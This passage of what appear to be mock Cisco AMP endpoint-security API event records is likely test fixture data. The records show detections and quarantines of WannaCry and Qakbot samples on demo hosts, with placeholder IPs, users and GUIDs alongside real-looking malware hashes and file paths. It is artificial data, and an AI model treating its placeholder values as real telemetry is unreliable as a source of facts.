Quarantined","event_type_id":553648143,"detection_id":"6419229327140847660","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":870000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229327140847671","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":698000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847666","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":5748,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":667000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":4772,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":28000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419229327140847656","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229322845880000,"timestamp":1610635263,"timestamp_nanoseconds":950000000,"date":"2021-01-14T14:41:03+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411488666497056775","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411488666497056774","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411488666497056773","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056775","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qYf.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\qYf.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056774","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4191700.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\4191700.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056773","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1493058569636000800,"timestamp":1610633340,"timestamp_nanoseconds":636000000,"date":"2021-01-14T14:09:00+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610633340,"start_date":"2021-01-14T14:09:00+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot is a 
worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/Windows/SysWOW64/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"b9c3eea0c27244f91cce86d57aca2b3f8d09f1dbd6274751226c6b09398a7ba4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772016730014000,"timestamp":1610631960,"timestamp_nanoseconds":611000000,"date":"2021-01-14T13:46:00+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6264772016730013699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772016730014000,"timestamp":1610631960,"timestamp_nanoseconds":65000000,"date":"2021-01-14T13:46:00+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D5221F6847-100.SBX.TG","detection_id":"6264772016730013699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b","sha1":"5058b16a86beee96927371210b9a9f682976a50a","md5":"48a0bf05b9706a00d2a0ff6260412f11"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772012435046000,"timestamp":1610631959,"timestamp_nanoseconds":940000000,"date":"2021-01-14T13:45:59+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D5221F6847-100.SBX.TG","detection_id":"6264772012435046402","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Unconfirmed 762952.crdownload","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\Unconfirmed 762952.crdownload","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":724000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":366000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":225000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741859","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":5580,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":210000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741858","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":194000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat 
